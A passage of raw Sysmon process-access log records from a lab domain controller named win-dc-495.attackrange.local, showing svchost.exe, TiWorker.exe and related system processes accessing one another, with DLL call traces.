STEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.851{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.851{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.851{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.851{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.851{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.851{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.851{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.836{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.820{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.820{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.820{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E804-00000000A301}3388C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 